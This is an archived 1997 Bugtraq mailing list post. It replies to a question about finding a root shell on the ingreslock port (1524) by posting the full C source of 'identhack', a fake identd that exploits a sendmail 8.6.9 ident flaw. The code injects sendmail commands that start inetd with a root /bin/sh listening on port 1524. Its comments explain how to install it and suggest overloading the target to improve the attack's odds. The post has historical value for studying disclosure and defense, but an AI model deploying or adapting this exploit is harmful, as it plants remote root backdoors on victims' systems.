[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: Ingreslock Misconfiguration?
From:       Matt <panzer () DHP ! COM>
Date:       1997-01-28 6:52:21
[Download RAW message or body]

Khelbin Sunvold <khelbin@CONNIX.COM> wrote:
> Just fooling around the other day on a box running ingres and i tried
> telneting to port 1524 (ingreslock) and was surprised to be dropped into a
> root shell.

Perhaps they were running 8.6.9 also....  See below:
--
 -Matt (panzer@dhp.com)  --  DataHaven Project - http://www.dhp.com/
  "That which can never be enforced should not be prohibited."

/* identhack - sendmail identd hack.
 * Michael R. Widner - atreus (2/24/95)
 * <widner@uchicago.edu> <atreus@primus.com>
 *
 * Make sure you don't do anything evil with this.  That would be wrong.
 *
 * This is a real simple hacked identd that will return a string to abuse
 * the sendmail 8.6.9 identd problem.
 * NOTE:  This hack only works when sendmail queues up the message for
 * later delivery.  This depends on the configuration of sendmail.cf and
 * on the machine loading.  If you can do something to drag the machine to
 * its knees, then fire off this attack, you stand a much better chance of
 * success.
 *
 * This should compile ok with just [g]cc -o identhack identhack.c
 * Then add an appropriate entry in your inetd.conf and kill -HUP identd.
 * ident  stream tcp  nowait  root  /tmp/identhack  in.identd
 * (identd port is 113, but hopefully your /etc/services knows that)
 *
 * Two noteworthy things:  Most people configure their sendmail.cf with
 * Og1 and Ou1 lines, setting the default user to bin.bin.  I see no way
 * to break root using this method if this is the case.  bin seems like the
 * best case scenario.
 */


#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* TIMEOUT is the number of seconds to wait before closing the connection if
 * the client doesn't provide the port pairs.
 */
#define TIMEOUT 120

/* PROCINFO_BUFFER_SIZE must be bigger than 80 */
#define OUTPUT_BUFFER_SIZE      2048
#define SOCKET_BUFFER_SIZE      100

unsigned short lport = 0, rport = 0;

void
main ()
{
    unsigned long here, there;
    struct fd_set fdset;
    struct timeval timeout;
    char buffer[OUTPUT_BUFFER_SIZE];
    char inbuffer[SOCKET_BUFFER_SIZE];
    int len;
    int fd;

    /* prepare to read ports */
    FD_ZERO (&fdset);
    FD_SET (0, &fdset);
    timeout.tv_sec = TIMEOUT;
    timeout.tv_usec = 0;

    /* read ports from stdin */
    select (1, &fdset, NULL, NULL, &timeout);
    len = read (0, inbuffer , SOCKET_BUFFER_SIZE - 1 );
    if (len <= 0)
            exit (0);
    FD_SET (0, &fdset);

    sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,
    "atreus)\r\nCroot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nMlocal, \
P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nR<\"|/bin/echo ingreslock stream tcp nowait root \
/bin/sh /bin/sh > /tmp/badfile\">\r\nR<\"|/usr/etc/inetd /tmp/badfile\">\r\n$rascii \
The choice  of commands to execute is virtually limitless.  I chose to startup a copy \
of inetd with /bin/sh answering on the ingreslock port, which is 1524.  I only chose \
this particular port because it's in most /etc/services and sun inetd won't accept \
port numbers  here, only services defined in /etc/services or services.byname if \
you're using yp.  Of course the syntax will vary by systems, as will the location of \
inetd.  So an intruder must at least know what type of system he's going after.");  \
write (1, buffer, strlen (buffer));  exit (0);
}


[prev in list] [next in list] [prev in thread] [next in thread]